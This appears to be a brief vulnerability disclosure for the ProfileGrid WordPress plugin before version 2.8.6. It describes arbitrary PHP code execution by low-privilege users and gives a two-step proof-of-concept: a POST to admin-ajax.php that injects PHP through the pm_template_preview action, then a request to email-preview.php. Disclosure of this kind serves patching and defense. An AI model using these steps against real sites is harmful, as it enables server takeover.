The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin.
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();
Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php